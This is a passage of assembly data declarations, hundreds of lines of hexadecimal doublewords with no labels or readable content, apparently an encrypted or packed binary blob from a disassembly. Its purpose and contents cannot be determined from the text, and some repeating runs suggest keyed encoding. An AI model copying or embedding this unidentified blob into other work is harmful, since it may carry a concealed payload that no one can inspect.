72B9B736h, 36BCEECFh dd 6B389E01h, 0C4B4AC44h, 76C88A5h, 0C0D8ACCBh, 8F8CA8C6h dd 36207AC1h, 502991E4h, 34DF4E00h, 0DA186354h, 170D2A94h dd 0A79F772h, 397CAE8Fh, 2079E8C1h, 0C6094782h, 9D2C7E5Fh dd 0F7EE9CA3h, 0BD142CEEh, 0C0DDFC83h, 905F23A4h, 13A5085Eh dd 20DCF86Fh, 504C6804h, 0FA3937B6h, 0A13C6E4Fh, 0B0CEE0C0h dd 64288794h, 0E279F72Ch, 337CAE88h, 0CC3EBDBBh, 42C1B8E2h dd 2EAC4860h, 0E6BDADFEh, 2534E50Fh, 0D93FF822h, 406C1D29h dd 31FF1802h, 0F45E5792h, 1F943794h, 9FACC8E5h, 203D48F0h dd 8AF26804h, 0C01A68E1h, 54E3081Ah, 607C99B5h, 852C16C4h dd 0BE1DFE25h, 57620134h, 6F379A81h, 7F4D2E42h, 0AA8D363Fh dd 33AD9A4h, 0DCD68DCBh, 4BD5A8F2h, 0DF993795h, 1DACC8E4h dd 1622C9F1h, 0D8CC8204h, 405C7898h, 45135B74h, 604AA49Eh dd 0F00C2479h, 3F19B7D4h, 0F92C4864h, 0A0BCD845h, 621C5605h dd 45D3AE5Dh, 506C8801h, 4CF4DEB7h, 0F483A5F8h, 1C38CDh dd 63D9E8D8h, 2F0664D8h, 0B0CC6481h, 6051D594h, 0EDCC2804h dd 1419FF95h, 0CCA05731h, 1E0CDF4h, 780CB71Ah, 0D1C9AC80h dd 404F1605h, 0B5F3D72Eh, 0AF2B4ECCh, 5ACD1734h, 708C8FD4h dd 0FF4EDAA3h, 0A6970271h, 70FC6B74h, 589CB854h, 405C789Dh dd 0BE9B6760h, 41DF7D8h, 0CA99D744h, 59C8EE8h, 231A3CA4h dd 0C439513Dh, 614C5EB8h, 0C0DEF87Ch, 63DD924h, 0DE69E764h dd 0FD8C9EF8h, 3607ABC1h, 599F98E4h, 726C0920h, 2533B955h dd 406A43E6h, 2FC80CA3h, 5647DE21h, 70CFD044h, 0B689D359h dd 0D3D54964h, 0A1D6D99Eh, 43B35B7Bh, 40C90710h, 662C8019h dd 0BE881934h, 2AF86841h, 0D097E367h, 0C0AFC357h, 9789D548h dd 3BCCDE19h, 405D742Eh, 0D8668324h, 637C98B5h, 90C703BCh dd 266F735Fh, 57293C05h, 8E572D16h, 6343AF07h, 4B8B349Fh dd 3A38D870h, 8AAE4974h, 7619573Bh, 8B1C0E68h, 0A697B269h dd 2CF8DB74h, 594F272Fh, 2A5BBF93h, 59ECE024h, 33BF9BFBh dd 0A7586E0Bh, 0DCD9EA95h, 624F2129h, 0C6D3AB9Bh, 591B34F0h dd 0B7B39C7Ah, 252FD4D7h, 8E996A46h, 2E9FEB0h, 6E735127h dd 0E0D48DB8h, 454E3718h, 0D198E876h, 34391FE6h, 0A49F676Ch dd 607C9AB4h, 7F7E7D14h, 0E3EED104h, 79566600h, 0D092BE91h dd 790268E8h, 0A5FCB357h, 381FFCC8h, 0EA8D6A4Ch, 22C9FB91h dd 4F565A74h, 0B68C86ADh, 544E3102h, 5899E271h, 405C7894h dd 73018979h, 0A67CAEAAh, 0C61943C1h, 1563B8D4h, 101A73FAh dd 0D4A33035h, 0BB5202B8h, 0F6E7AEA1h, 6CC0D1A4h, 86D66D1Ah dd 6D739645h, 0BD911B21h, 909AF4BEh, 773E2EFFh, 3D698EA1h dd 766BA911h, 27698724h, 9A7CAE83h, 7CF66ECDh, 3167469Ah dd 0FBE3AA65h, 5BA33095h, 4CCF977Bh, 0B5D8F030h, 58E94EF1h dd 0E0FC2E74h, 708CA02Ch, 435A6B54h, 0DCE08CCAh, 8AA9A774h dd 0BBCCDE3Fh, 0D34B0C54h, 2FBF0A4Eh, 5647CA21h, 84CCAD44h dd 881946DCh, 0EF2C7E24h, 24544B24h, 0D8B3977Ah, 0C0DCF81Fh dd 0F2FCEF7h, 0A4D24B7Bh, 8F8CE488h, 362792C1h, 6EC520E4h dd 0CED4A78Bh, 4F3317F1h, 764EA919h, 5D253B24h, 563C9C31h dd 0A15D7944h, 0D1CDE885h, 0B6B9B735h, 48BCEECFh, 304C688Fh dd 9299AB41h, 1442BA97h, 1FFC5478h, 46B70251h, 16D054h dd 0E3DBC8E4h, 4E552A04h, 0B08D8E70h, 12C987C4h, 59EC3E1Fh dd 5647C231h, 7D3D2744h, 0B685C959h, 70A9C164h, 0F1BCEEC8h dd 0BE6FD7Bh, 0A84FF822h, 506C88A0h, 0F982ADB9h, 0FDD5A8F2h dd 36207EE9h, 650320E4h, 0E75AA78Bh, 86D28281h, 0C30C7894h dd 0E6F26481h, 0F5F198B4h, 0F03A366Eh, 81F6EC84h, 787E480Eh dd 20BCD8F6h, 0C06FD7Bh, 59F822h, 0DD4EFDFEh, 0D6E245B9h dd 76E6FAC4h, 1E768DD9h, 0C6F8C8D2h, 726D0824h, 8C827DFBh dd 0BF0478A2h, 0E6D04EB1h, 7F95EB4h, 0F00C1E7Ah, 809CB43Ch dd 5F7F1F64h, 928F93B7h, 7C002CAAh, 6A490714h, 0C36CBE9Fh dd 0E0FC1F5Ch, 0A53925C4h, 591C0E4Ch, 0ACBA7569h, 0AD45842h dd 583317F1h, 405C7898h, 99A24173h, 4E28DDFAh, 0F0406400h dd 0BB362D2Bh, 0D0A94852h, 0A2895CFBh, 58DF6884h, 0C0DCF811h dd 497F3D29h, 6DA51802h, 46B09A79h, 0F4EFD054h, 2D2F371Bh dd 200A6442h, 0A048E704h, 0C15C7896h, 0D0ED98C8h, 6114CCB4h dd 0F0C2845h, 0B6A0AE41h, 80E8C964h, 0F0BCD8F5h, 3026BC0Fh dd 0F6490746h, 0D56CBE98h, 0ED8941F4h, 709F20ACh, 0CA89C754h dd 7BACFEDFh, 4C81DB96h, 0B0CCDE1Ah, 0C5D151E1h, 0D0DA1654h dd 42E967E4h, 750C1E78h, 918B714h, 9B2C4865h, 0A037D4B4h dd 0B5C3587Bh, 0C0EAE678h, 6E0B0D62h, 8AFD1802h, 1A8DC2C4h dd 2E89C756h, 13ACFED8h, 0A433A78Ch, 0B0CCE964h, 28C9F507h dd 0BAEC3E3Ah, 9F2FCAA4h, 0C63036D1h, 8F5C3DD4h, 102D08E1h dd 220155F4h, 814C5E9Ah, 3AF5101Ch, 0C404775Bh, 0BEFC1834h dd 44054EEFh, 95E36C70h, 909AF346h, 3EACE5F9h, 0B17DE832h dd 0BFA6727Ch, 0AD7985DBh, 0A7CAEAAh, 0F0184044h, 0D3CEB8D4h dd 2C06DD9Bh, 0E431D8C2h, 0A5C17CA0h, 0C0EAB810h, 5ADA87F4h dd 0F4D85CBFh, 72844805h, 4A0E391Eh, 93E6DAE6h, 28181C7Fh dd 71C30984h, 4B0D7074h, 2FFC2C60h, 0DDF1C886h, 0F03A142Ch dd 809CA43Ch, 26026D64h, 8092F88Ch, 157648AAh, 0F8F2DD31h dd 7014ADDCh, 0AAF66B11h dd 50C2E18Bh, 95E36F54h, 909AF3BEh, 20909CF5h, 0B0A6E804h dd 0BF0F2FC4h, 0E6D022B1h, 0E4F113B4h, 9A0C1E51h, 0EB875BD4h dd 0F87D45ADh, 0A0BCD8F1h, 3A284DA2h, 5523AF14h, 505AB3FEh dd 0B0F0DCB7h, 77E4A32Fh, 8D1C3854h, 0A6B25E59h, 0DF6F0F74h dd 86F0C291h, 3E9CFD94h, 0B8598570h, 0E37CAE88h, 0C619ACE1h dd 0D11B8D4h, 101A7603h, 0A0D616DFh, 0CF1F3ED5h, 0F6E0DE81h dd 50940BA4h, 6B6D374Ah, 1839253Ah, 0B01C0E68h, 0E5023AE9h dd 37D43864h, 0D13317FEh, 49BF6FE6h, 3BED7FA9h, 4BB3135Eh dd 98B1A58Ah, 739C8EE8h, 0FBDBCFC0h, 35438B4Dh, 307A549Eh dd 0D5B74594h, 246D8892h, 95CC701Eh, 0E573A8C4h, 2A039Eh dd 0AECB7564h, 543C5842h, 0DC492F15h, 405C4E8Ah, 16EC0824h dd 5642FF31h, 0F8E52844h, 4763472Ah, 26393CE1h, 0A0BCD8F4h dd 348E3504h, 8FD6F514h, 3F03E684h, 8693385Ah, 16E5C4E4h dd 4F3C1931h, 0FDC5BCC4h, 4F487811h, 0DCA98B24h, 212E1AF1h dd 0DDCD6D50h, 405CB8BEh, 0D0430864h, 0EDF1CDA7h, 770C3A01h dd 0C5D8AA95h, 3A4149EAh, 0A5B09D46h, 3500FCCAh, 99906B47h dd 0EDC0E4h, 613C4124h, 0F58CAC8Ah, 4359280Ch, 0C4A28970h dd 342F58B8h, 0B9886645h, 4046FFDAh, 0A7062569h, 0E8FFCCB5h dd 304B260Dh, 80D0B495h, 103509E0h, 0E0B89675h, 380BE1CAh dd 86DC3440h, 16ACDAABh, 6E795126h, 0D98CBB80h, 495D2F54h dd 0BAC1D270h, 323910C3h, 0A28D2841h, 0F05B8D1h, 962C0431h dd 0EEF9D1A6h, 30133B00h, 0C5D1B7B7h, 440548A5h, 0E0AF9134h dd 3501E1D0h, 94B53815h, 1CACDBE3h, 21794C35h, 0A06B4CE0h dd 6FE82277h, 77A4708Bh, 0CFED93Ch, 0C04A1C0Dh, 12E71Bh dd 3893E444h, 42F07488h, 0A90E2CB4h, 0BEDF9BD4h, 304C6884h dd 0C0DCF814h, 506C88A4h, 0E0FC1834h, 708CA8C4h, 1C3854h dd 90ACC8E4h, 203C5874h, 0B0CCE804h, 405C7894h, 0D0EC0824h dd 607C98B4h, 0F00C2844h, 809CB8D4h, 102C4864h, 0A0BCD8F4h dd 304C6884h, 0C0DCF814h, 506C88A4h, 0E0FC1834h, 708CA8C4h dd 1C3854h, 44094B84h, 203C6E4Bh, 8F144D87h, 4F5C78A2h dd 5DF84B93h, 0D77380E7h, 200F2E0Fh, 0A4B8FC5Fh, 62200A4Fh dd 0A8FEE3EDh, 72C77CF7h, 0CC9ED300h, 6FB81D2Dh, 65751802h dd 70BA971Ch, 0C29F3DBFh, 0F1752ACCh, 0A83C5CB6h, 86E88E81h dd 40389094h, 0CF840824h, 0ED7C98B4h, 0C62FBBC1h, 98A5E1D4h dd 0D0AF4410h, 5F4B3AF0h, 673DC01h, 192B3B14h, 740A05A7h dd 0F01F1802h, 0FF70D83Bh, 4F4BB54h, 0D253E06h, 200A7BE7h dd 0C4CCD287h, 436E5391h, 9E611856h, 3E27C048h, 840C12C7h dd 6BAE47D0h, 5EB767h, 5F438F1Ch, 1B82437Bh, 0F6E32099h dd 1B6FD0A4h, 6573DB00h, 70BA977Ch, 3FA8BD93h, 90ACC8D2h dd 1CD45874h, 3BCCE804h, 7663CC11h, 267AE024h, 7894674Bh dd 730C2844h, 0B6A30C69h, 18594864h, 84B3457Dh, 0ACA768B2h dd 0FF6875EBh, 0DFAF8892h, 0D6C3A0B1h, 0C41921C4h, 0E81C0E6Bh dd 90ACC8E7h, 0ABFF9147h, 0B0CC6897h, 0ADB42A94h, 0D313F7DAh dd 56434021h, 73DA2B44h, 8F9CB4AEh, 102D4FE0h, 0B0C65BF4h dd 0CDC86784h, 4BDCF814h, 0B83C84E6h, 1F03E6FCh, 4F542DC7h dd 0C61F3862h, 10A442B4h, 3948588Dh, 0C4E21184h, 0B1B73897h dd 51ED40AFh, 0BFA34755h, 0B4F5A99Bh, 0F59CF498h, 0D8071188h dd 0AF462177h, 304CDF0Bh, 0B85D9E14h, 5F5EBB5Ah, 0E0FCB3B1h dd 4A0FFEC4h, 8B194D54h, 9247D8AEh, 0D13F52FFh, 4EBE0055h dd 0F55F876Bh, 0D0DA37FCh, 18BC1D19h, 748827BFh, 7F9CB8D4h dd 261390D1h, 0F55488F4h, 33B3977Ah, 0F6E32091h, 88E907A4h dd 0E3FC2E0Bh, 0F3DF8CC0h, 0DB2F3A94h, 73A47EEBh, 0F5D866h dd 94E82957h, 64405190h, 8BC8040Dh, 0E19573F4h, 4BDB27BFh dd 1A2CC09h, 7E69E09Fh, 218AAC2Fh, 9177317Fh, 41F28CEBh dd 0E54E5E5Fh, 61DA6C98h, 28653B3Fh, 81024CA7h, 0C845B51Fh dd 0A12A2C87h, 95F3AEFFh, 0C1520C75h, 0F5D338DFh, 9F7AEC55h dd 0C63390D1h, 0F175E3D4h, 4ED3B79Bh, 49A81A77h, 0CFB3966Bh dd 0C4B6FBD7h, 0A55A60FCh, 7574E7CBh, 70BA8E84h, 182D8032h dd 746C2AE6h, 46DE5A77h, 0E8CA82AFh, 0BFA9637Ch, 0D82E8BDBh dd 65164933h, 502C01Ch, 7A1C472Bh, 0A0273B67h, 0E039DAA4h dd 9A4C5EA2h, 0A8B6DFFFh, 0AAEC22FCh, 50E46D37h, 846240D5h dd 1A4C7ABh, 14ACC8E4h, 0F1312CA6h, 5B0616E4h, 0F8599362h dd 50EC0824h, 0A3C37A1Fh, 0C8BCBDC9h, 57B7B8E2h, 0E7EF9293h dd 96847D71h, 304C6884h, 49F71Ch, 0A6676865h, 0D6C4BBB1h dd 76F9A9C4h, 25953532h, 155ADB0Fh, 200A60D7h, 0D6CA9D06h dd 0AB794999h, 0D1E16E20h, 88D7FE91h, 0FF3D7F8h, 9A8FB5Fh dd 261384F1h, 577F73F4h, 674CD01h, 0C0DCF814h, 90F987ACh dd 856A430h, 8F735758h, 3FCCADDDh, 155AC8D2h, 200A60D7h dd 0BFC89D05h, 6B5E93A5h, 272FA3E4h, 56443D31h, 0F00C2844h dd 0ABBCCDCh, 2614D7E1h, 0AB5C19F4h, 75C765E2h, 386C5372h dd 0CFE9020Eh, 21FC2E0Ch, 1789B324h, 0AB1AB130h, 3BCA08D7h dd 44844A9Fh, 1BCCED8Bh, 78C3FD1Eh, 88E80812h, 0CB647875h dd 1BF09887h, 6B24DEF4h, 0FB872E64h, 0F8B8B2EDh, 0CFBF976Ch dd 12D875EBh, 36646865h, 863C9131h, 0C08F436Fh, 27692C4h dd 634A20BCh, 0F2B8A78Bh, 0B8A6DA70h, 0B38690CCh, 1A12F7DBh dd 0A5085BC6h, 3978E2BAh, 5BE8722Ah, 1C58829Ah, 0ACC8120Ah dd 3C38A27Ah, 0D3701A4h, 99877514h, 2517ED84h, 0B1675074h dd 0B0A1B597h, 67ACFEDCh, 1604FDF1h, 0B0CCE804h, 0F05F0C14h dd 551BA244h, 604AA011h, 0F80C2844h, 0D524BFA0h, 0BB2CA4EFh dd 5392FBBh, 334C5EBCh, 0CFDDF814h, 506C5F20h, 4A14A834h dd 0CC31216Fh, 0B01C0E6Bh, 1907620Ch, 160398C9h, 15491F04h dd 435C4EACh, 0A4EC0824h, 0C5F96FA1h, 0F00C1E7Ch, 0F49DB8D4h dd 0EEEDA061h, 490C270Bh, 0B5C7C32Eh, 0C0EAC7A8h, 9847472Fh dd 0DF38A5BDh, 3805A8F2h, 647B80A8h, 0A307FE1Bh, 0D7973EB4h dd 86F44D81h, 405C7B94h, 26E27C24h, 56443B31h, 0F578A844h dd 7F62FA3Ch, 744BF09Bh, 9317FE7Dh, 0C7E70E44h, 0F6E45D91h dd 506C8BA4h, 16A96C34h, 46B40B41h, 569B854h, 6F52D60Ch dd 0DD98B08Bh, 907C17FBh, 0BFA7CE7Ch, 0B6D5EBDBh, 669670Ch dd 7BA7B9EFh, 0B6A41D41h, 0E7FEBF64h, 0A0BCDB36h, 0D8581D84h dd 3F23056Ah, 0C0849714h, 8603E7CFh, 1699577Ch, 8BB7A9FFh dd 5429432Bh, 0B3C6E4Bh, 4C8461CCh, 78F9FD63h, 0D0EF0812h dd 4E0898B4h, 0C8A9ADB3h, 809CB8E2h, 32584E64h, 98195D03h dd 304C68B2h, 0C5A9F914h, 0AF917A4Ch, 4579EFCBh, 708C9EFCh dd 74183854h, 6EA120E1h, 0A5CBA78Bh, 0B0FAD0A1h, 405C7890h dd 0B7041F50h, 0D883674Ah, 38F2E86Dh, 4094007Fh, 0A8874C10h dd 0C7572081h, 95C99F2Fh, 0C8DCCE2Ch, 256C88A4h, 4341987Bh dd 708C9EFCh, 3BF47E20h, 2853371Ah, 0E915405Dh, 88534D0Eh dd 0A49C78A2h, 4F490227h, 0CB7CAE8Ch, 7AA699F4h, 0B6A41B51h dd 509CE264h, 98235DFEh, 56E668B2h, 37211AACh, 66542D21h dd 0E0FC0834h, 0C08BDCC4h, 0B87A921Dh, 3BCA3491h, 1396B0C4h dd 0D4543C4h, 406A473Ch, 0E8498DD3h, 605C9882h, 0F9792844h dd 596E064h, 101A70F9h, 2104BE5Eh, 95C99F44h, 80DCCE2Ch dd 246C88A4h, 0C8389837h dd 48110DCEh, 0AB7A3862h, 0AF00756Dh, 0D7975842h, 86F44D81h dd 405C7894h, 60E57D64h, 0FDF99AE4h, 5A0C1E7Ch, 0B8393D23h dd 10AC4852h, 0ABC9D8F4h, 0B546D034h, 0C0EAC08Ah, 3651630Eh dd 17E4298Ch, 46B40D41h, 1D3854h, 20AEBCE4h, 0BE99525Dh dd 70CCDE3Ch, 0E5567B70h, 0D0DA30BAh, 0D81A33D2h, 75FBD8C5h dd 80AA8071h, 102C4A64h, 6808DA81h, 8D2CD8Eh, 6BBAF822h dd 6FA4352Dh, 50441802h, 0DB8CA8ECh, 38B9BDA3h, 90A4C8D2h dd 51485874h, 4F31D9ECh, 0E5D98F6Bh, 0D0EC3E1Ch, 157C98B0h dd 0FAB4984Fh, 0B6A42751h, 5DC7E264h, 98195D03h, 384C68B2h dd 0D1A9F814h, 0B0EF30C2h, 0D863BD3Eh, 0DBEAA8F2h, 0EBB6F867h dd 0B914AEF1h, 0BF99526Ch, 70CCDE3Ch, 0E5567B70h, 0D0DA30BBh dd 0E58B33D2h, 0F03A10E1h, 809CA8D4h, 0D0ADF002h, 643CDB80h dd 0AFE9628Ch, 0A6DCCE2Ch, 0D5DA870Fh, 0E0CA2097h, 8C4C406Fh dd 85EBC7ABh, 909AF041h, 603C5874h, 0E07CE170h, 78C1FD96h dd 27460812h, 56443D31h, 0F02C2844h, 0F51A08D4h, 9D284C66h dd 53626BBh, 307A5019h, 0FF6C759Dh, 0FB0A8892h, 95F9E4B4h dd 0F08C18C3h, 0AA5CC71Bh, 6F50B10Ch, 85B9AF8Bh, 0B0CCDE3Ch dd 265C78D4h, 0A5DD6E9Ch, 6552CB6h, 0FA1498EFh, 0B6A42751h dd 13CC8864h, 5CE8305Eh, 0B8FC977Bh, 0F8797DE3h, 0D06C8892h dd 0E2891834h, 0D5062E74h, 2A00C9h, 6C2C6382h, 903B2D71h dd 4F836804h, 6BB4D2D4h, 2713F7D8h, 56443D31h, 0F10C2844h dd 3097CDD4h, 8DA94224h, 0ABCEECCh, 882A676Fh, 65D63897h dd 505AB039h, 0E14CB352h, 0D5095F6Eh, 1C0E6Ch, 0E5ACCAE4h dd 85B9AF5Bh, 0B0CCDE3Ch, 355C7C94h, 0DA2CB83Eh, 56440731h dd 54A9A244h, 419C8EECh, 0A84A5884h, 10175992h, 80448384h dd 5F59F254h, 0FA6CBE9Ch, 0D8599DC3h, 708CA8F2h, 1069385Ch dd 782F7082h, 18A2FD7Eh, 1BAAE832h, 48B77924h, 55E64094h dd 604AA02Ah, 5589DFEEh, 809C8EECh, 0A12C5864h, 0C699AD81h dd 3AB4EB3Ch, 0F6E466B1h, 63C7EEA4h, 5DD5B2F4h, 70BA9774h dd 38B9BDA3h, 90ACC8D2h, 3F495854h, 0AB279FB5h, 5855C0F2h dd 0E872AD2Eh, 84BC9882h, 6EA92247h, 0E69C8EECh, 0A09161CFh dd 2ABCEECBh, 80E9E245h, 0A6DCCE2Bh, 5234380Fh, 0D6C485B1h dd 0F57B02C4h, 2A00F1h, 91ACC8E7h, 0A5CB7A00h, 0B0FAD0A1h dd 445C7894h, 551B1E51h, 604AA011h, 0F30C2844h, 474BDA1h dd 0F8D3B79Eh, 5F43225Fh, 8E9ED73h, 0C0DCF822h, 531880A4h dd 1756D184h, 46B40D41h, 1C3854h, 208CBC64h, 0BDB97273h dd 71CCDE3Ch, 0C9516274h, 0D2EC2C2Ch, 56440511h, 0F3E8E844h dd 2B987C54h, 768629D4h, 0AA5C274Ch, 674F521h, 37779E14h dd 66542D21h, 0E0FC3834h, 87DFDCC4h, 36249DD1h, 90ACC8E4h dd 0D7312C54h, 0B0CCEBC3h, 0F0590C94h, 2307A2B4h, 0EDF75F3Fh dd 0F03A17ECh, 0C11579FFh, 1A74F898h, 96844571h, 0B5BBC284h dd 0C0EAC0B1h, 502C88A4h, 589A1440h, 0F5866B94h, 2A00C9h dd 28CAC20Fh, 8536B88Bh, 0B0FAD099h, 0C5ABD3F2h, 0D0DA3081h dd 617C98B7h, 75FB5B30h, 80AA8071h, 302C4864h, 674BD580h dd 304C6887h, 506CFD60h, 0DB9F630Eh, 207993FBh, 5B8C9EFBh dd 0FC54B19Ch, 155B01D7h, 200A60D1h, 0B04CE804h, 0C5D176E1h dd 0D0DA30B9h, 0E03C903Eh, 87F2BBDh, 0C451BC59h, 0D12C5840h dd 2B0CD014h, 564A8B2Fh, 0A61CC9ACh, 0DFD4EE0Fh, 0E04470B4h dd 918EA8C4h, 0AB449332h, 96D90161h, 0E00DE012h, 737C4362h dd 0F0D9F53Eh, 27EC3E1Ch, 56443D31h, 0F00C2844h, 0D79ACDC4h dd 0FB74B04Fh, 88EF53EDh, 0E06790AFh, 0FF14759Fh, 0C56D8892h dd 0E0CA279Ch, 340791C5h, 0BD953C70h, 909AD883h, 1F90E5FFh dd 35E7E832h, 406A473Ch, 0E8498DD3h, 603C9882h, 0F2782844h dd 42376023h, 477A4860h, 9F5C6577h, 3F4C68B2h, 0C0DD2190h dd 506160A4h, 0A5B71834h, 3CC9E696h, 44320A67h, 6FAC84A8h dd 1607CAE1h, 44496104h, 135C4EABh, 0D3D050AFh, 480F676Ch dd 18386BCFh, 7F634D34h, 2FF8DDEFh, 0A3E7D8C2h, 0B5C564C6h dd 0C0EAC7ECh, 0D964CAA7h, 0D6C3E4B1h, 58FF23C4h, 9C8BABh dd 2944C8E4h, 0ABC3A781h, 86F33CB9h, 0EDB42E94h, 5B13F7D1h dd 56434C21h, 0F846A344h, 0AB90F2D7h, 15C5CBAAh, 0A1DC50FBh dd 0B4436884h, 0C0DCF94Eh, 6FB43DA7h, 55FF1802h, 70BA975Ch dd 0FF404F8h, 90AC6A61h, 247AD574h, 8F546D2Fh, 465F78A2h dd 2586E074h, 0DDFF674Bh, 0F03A1790h, 0BB97CDD4h, 93234423h dd 0A0BCD9EFh, 0A575646Fh, 0C0EAC7C0h, 51610DABh, 65FF1834h dd 70BA975Ch, 0FF24B932h, 6C29C7C1h, 0AB3C5874h, 0F3E7EA44h dd 6DB428A0h, 0E913F7D1h, 56434C09h, 14892744h, 839CB8D4h dd 261390E1h, 3839DBF4h, 0BB4C5EBBh, 0CC9BD314h, 50A10AABh dd 0A7C71834h, 0B40FA7CCh, 831C3854h, 0D7AFCA24h, 0B8B95B60h dd 0E2CCDE3Bh, 0B4E987C4h, 2FEC3E1Bh, 5647CA21h, 30897244h dd 802B3DDBh, 8CC54864h, 9CBCD8F4h, 0A4C9677Bh, 40DCF814h dd 0D5639D9Ah, 0E0FC18BFh, 5B8DEE4Fh, 0E84C0C17h, 6F533C58h dd 1FE8E54Dh, 0C7B9E832h, 7F84FD97h, 55EF0812h, 604AA72Ch dd 0B00CADCDh, 8017B8E2h, 2FD4CD5Fh, 0A8CED8C2h, 0FB0EDBFh dd 0A9AEF822h, 506C8899h, 8CB6A44h, 708CA8DBh, 8BE076D9h dd 93AEE325h, 0A5074836h, 0B0FAA804h, 84DF74E1h, 5FDDF734h dd 160BCF0h, 7FCF33AFh, 0B6A30051h, 0A5A72864h, 0A08AE76Ch dd 0CFB9326Ch, 0C07599EBh, 25EC88A4h, 0ECBB333Ah, 37B7A1B6h dd 3C9E375Ch, 0D953371Bh, 0DE8EDD7Bh, 8C4717FBh, 0E5FBF9B0h dd 2FEC080Ch, 8B03674Bh, 0D446A906h, 609CB8B4h, 9BEC7B2Ah dd 253BFCF8h, 307A5764h, 0FF007D9Dh, 0E9E18892h, 0E0FC309Dh dd 4F142DC7h, 0A57A3862h, 56878641h, 0B281A77h, 0F60AE446h dd 0C19B906Fh, 0D0EC0876h, 607C98B1h, 0AFF06ECDh, 7FCB7B8Ah dd 2617D6F1h, 0BF5419F4h, 3156ED8Bh, 948CF814h, 0AF06A0CEh dd 0DB028DCBh, 0B009A8F2h, 594370Bh, 78ACC8E5h, 0DFC3BD34h dd 0B0CCF9ECh, 34392B94h, 0B5806162h, 151FFDE7h, 89784136h dd 3563B895h, 101A7708h, 9BEE4D0Bh, 0B5C568B2h, 0C0EAC760h dd 506C914Ch, 0B4994B34h, 3FE9C3A5h, 72795623h, 0E0C5A097h dd 56552A24h, 0D7A9846Dh, 0A80B78F1h, 2F13E135h, 607C8B5Ch dd 0A2697B44h, 0EFE8CBB1h, 627C2D16h, 0CCD5AE9Dh, 30290FE1h dd 282F1043h, 4284775Bh, 0B3FC1834h, 13EDEAA1h, 506C4D3Fh dd 0F9DAA196h, 455B3D18h, 6624BF04h, 0A8A3877Ch, 0D0EC083Ch dd 83FFDE7h, 956B4625h, 0E9E8D79Ah, 627C3102h, 0CCD5AE9Dh dd 30290FE1h, 286F1043h, 43C775Bh, 0DA4C9DB9h, 14E6A8F2h dd 571D5204h, 0ACA65D1Bh, 1CB55842h, 0F6591720h, 6A5C4EAFh dd 0B85185E4h, 307CAE8Ah, 45F37814h, 80AA8264h, 142C490Ch dd 0A1D68CF4h, 44D997D3h, 94DCCE2Bh, 0AF3B8CCEh, 0D6C36CA1h dd 64482BC4h, 3F708DABh, 553C8D2h, 200A63F6h, 5412B5Bh dd 406A46FCh, 5679F772h, 0E37CAE8Fh, 7403D7BCh, 809CB86Fh dd 2F54CDEDh, 0A0D6D8C2h, 0F2D997D2h, 45DCCE2Fh, 0F4E88764h dd 0CBFC1834h, 1ADCF804h, 1766857h, 90ACC88Ch, 0B5C30EB4h dd 0B0FAD366h, 4FA38017h, 0D0E9E0A0h, 1CF911B4h, 7D0C1E7Bh dd 0B6A33859h, 98B9C564h, 0F1BCEECBh, 604C02D6h, 0FB526DEBh dd 0A8EF8892h, 567817CBh dd 1A8CA8C1h, 7CA9C754h, 6FACFEDBh, 1607D2E1h, 4F346B04h dd 45C3FC9Bh, 55650824h, 604AA724h, 330FE177h, 0EACDE885h dd 0A5D31960h, 0A08AE788h, 0B2AFD7Bh, 59F822h, 55170CABh dd 29CF1834h, 4F182D4Dh, 514D3862h, 90B3A0B5h, 0DF6C587Bh dd 86F74691h, 4F9CFD94h, 0D0E93CA0h, 0F8F911B4h, 330C1E7Bh dd 80ECB06Ch, 2867C364h, 98195D03h, 304C68B2h, 0C6A9E814h dd 400B0DA7h, 32CF1802h, 817B69C7h, 8595D9A3h, 909AF740h dd 2014F7CCh, 8C876304h, 503BFD97h, 2DF0812h, 918B59B7h dd 7585C9B3h, 80AA8748h, 5B9B47A7h, 955F21F2h, 3F543B09h dd 0C3C8BBA3h, 9107C174h, 612C1B1Ch, 19FBF7FEh, 1D68C13Ah dd 91A0B267h, 6BB7B806h, 0A48E6338h, 0CD4C3A97h, 27134060h dd 5BBDBB6Dh, 0C633B8C1h, 0D4177BD4h, 0D01F5840h, 0A0045A7Bh dd 0BB8F6884h, 4DD713DBh, 6652E019h, 3F77E434h, 4C2061F7h dd 3C1A4A35h, 0BCAEBF9Eh, 7C00F254h, 9EF00470h, 4060A5E0h dd 190FE051h, 2541993Fh, 840C6D1Ch, 0C3CF85DFh, 95234836h dd 5F4327C7h, 67716B0Fh, 0CF9FB65Dh, 0AF93AE20h, 0A3AB25CBh dd 0F483E691h, 0FFE3C74Fh, 0A3EF9FD9h, 30B85746h, 8D3317FBh dd 0F082BC4h, 2FE98C2Bh, 0BB4F674Bh, 0FF205ACh, 688CCD2Bh dd 0EFD3B49Eh, 5F42F91Ch, 0DCC8677Bh, 0F32307EAh, 507A6076h dd 83141834h, 9873573Bh, 1C3854h, 0C34149B9h, 0C93C6E47h dd 0B0CCEBDFh, 0CB6E87F0h, 0E6D39091h, 42F5FCB4h, 0BD32A922h dd 4419B78Eh, 9B2C4867h, 7EBFE4AAh, 6077E9E2h, 7459F751h dd 0A76C88A7h, 0C0FC0E77h, 0F583A8C4h, 1C3BF3h, 92F08B12h dd 23A1DC7Bh, 0F347E804h, 0E0FC459Ch, 54E3A884h, 607C9B3Bh dd 0D02C0879h, 418B7F4h, 0F82C4867h, 5F43264Dh, 3335EA8Bh dd 655FF814h, 505AB778h, 0E8BE9334h, 5B9CE24Fh, 33184B95h dd 93A92324h, 3076D1BCh, 8F6C6D8Dh, 0A5F78A2h, 0D0ECB028h dd 882D98B5h, 0FF3CFD4h, 0B83F2DE4h, 309D4852h, 98186DC4h dd 102668B2h, 0B88431EAh, 0B71A60B0h, 3279E7CBh, 0A34E3CCBh dd 0A58909B6h, 7BACFEDCh, 85B9AF91h, 0B0CCDE3Ch, 345D7894h dd 7569FF06h, 637CAE8Ch, 850C2844h, 253939D8h, 0EF2C7E5Ch dd 4B47270Bh, 95C1E98Eh, 0C0DCCE2Ch, 386488A4h, 0E0FC1832h dd 708AC09Dh, 0E8443854h, 6F532FCCh, 18A1DDFEh, 344AE832h dd 7664E5BEh, 4D698024h, 827CAE8Ch, 5589DFA4h, 889C8EECh dd 652C4864h, 3F0158FDh, 314C5EBCh, 452B3D60h, 505AB001h dd 0E8FC1834h, 0CD0CB3B0h, 2A00C9h, 101CBCE1h, 1604C6C9h dd 17B8ED04h, 78C3C514h, 0A4E90812h, 0C5F96F2Ah, 0F00C1E7Ch dd 0F41CB8D4h, 8D91C86Dh, 0A2BCEECCh, 95CFE1F3h, 0C0EAC7F4h dd 0A36B60A4h, 8114E7CBh, 98735739h, 1C3A24h, 0AF30556Fh 